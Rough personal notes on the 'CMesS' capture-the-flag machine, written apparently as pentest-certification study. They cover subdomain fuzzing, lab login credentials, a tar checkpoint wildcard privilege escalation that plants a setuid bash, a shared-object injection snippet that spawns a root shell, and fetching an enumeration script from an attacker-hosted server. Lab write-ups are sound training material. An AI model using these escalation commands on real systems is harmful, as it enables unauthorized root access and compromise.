Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

Challenge Machine (CMesS)

can’t get easy or quick SQL

directory busting?

admin page but no way to login or create account.

subdomain? (needs etc/hosts)

wfuzz -c -f sub-fighter -w top5000.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290

we found dev.cmess.thm

to make sure we can access it, we have to also add the subdomain in /etc/hosts

once we access it, we get this login:

andre@cmess.thm
:
KPFTN_f2yxe%

we get access as admin and can manage files. Can we reverse php?

upload but didn’t see it.*************

create it?

can’t access it

**************it uploaded into assets.

NOT WORKING

YOU CAN MAKE SURE THE COPY AND PASTE SPACING IS CORRECT BY RECOPYING FROM SOURCE

find stuff:

sudo -l
find / -type f -perm -04000 -ls 2>/dev/null

result:

793613     12 -rwsr-xr-x   1 root     root        10624 May  8  2018 /usr/bin/vmware-user-suid-wrapper
   783398     40 -rwsr-xr-x   1 root     root        40432 May 16  2017 /usr/bin/chsh
   783459     76 -rwsr-xr-x   1 root     root        75304 May 16  2017 /usr/bin/gpasswd
   783525     40 -rwsr-xr-x   1 root     root        39904 May 16  2017 /usr/bin/newgrp
   783536     56 -rwsr-xr-x   1 root     root        54256 May 16  2017 /usr/bin/passwd
   783396     52 -rwsr-xr-x   1 root     root        49584 May 16  2017 /usr/bin/chfn
   783620    136 -rwsr-xr-x   1 root     root       136808 Jul  4  2017 /usr/bin/sudo
   783722     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   794343    420 -rwsr-xr-x   1 root     root       428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   790045     44 -rwsr-xr--   1 root     messagebus    42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   134288    140 -rwsr-xr-x   1 root     root         142032 Jan 28  2017 /bin/ntfs-3g
   134285     32 -rwsr-xr-x   1 root     root          30800 Jul 12  2016 /bin/fusermount
   130621     40 -rwsr-xr-x   1 root     root          40152 May 16  2018 /bin/mount
   130636     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /bin/ping6
   130652     40 -rwsr-xr-x   1 root     root          40128 May 16  2017 /bin/su
   130635     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /bin/ping
   130670     28 -rwsr-xr-x   1 root     root          27608 May 16  2018 /bin/umount

new search

strace /usr/bin/vmware-user-suid-wrapper 2>&1 | grep -i -E "open|access|no such file"

result:

access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
vmware-user: could not open /proc/fs/vmblock/dev

can we make file in etc?

__________________________________________________________________________________________________________

this might take too much time. Check crons first:

cat /etc/crontab

result:

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

we can do checkpoints!

make the exploit file:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh

give it perms:

chmod +x runme.sh

exploit:

format:

tar czf /tmp/backup.tar.gz <do something>

now:

tar -zcf /tmp/andre_backup.tar.gz *

but it CDs into backup folder first. So we need to go there first as well!

touch /home/andre/backup/--checkpoint=1 
touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh

********* We can come back to this but we can’t touch in andre’s

now we check until the tmp/bash is created:

ls -la /tmp

once it is, we can run it:

/tmp/bash -p

we have root!

__________________________________________________________________________________________________________

capabilities?

getcap -r / 2>/dev/null

result:

/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep

__________________________________________________________________________________________________________

back to shared object injection:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
access("/etc/suid-debug", F_OK)
cd /home/tmp/
nano suid-debug.c
ctrl+x
y
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c

non work. Try LinPEAS or LinEnum?

transfer them:

wget http://10.6.62.12:8920/LinEnum.sh

host up the files:

python3 -m http.server 8920

what is .bak files?

cat /opt/.password.bak
image

we get ssh for user andre:

ssh andre@10.10.234.116
UQfsdCB7aAP6

now we can go back and do checkpoints! (go above)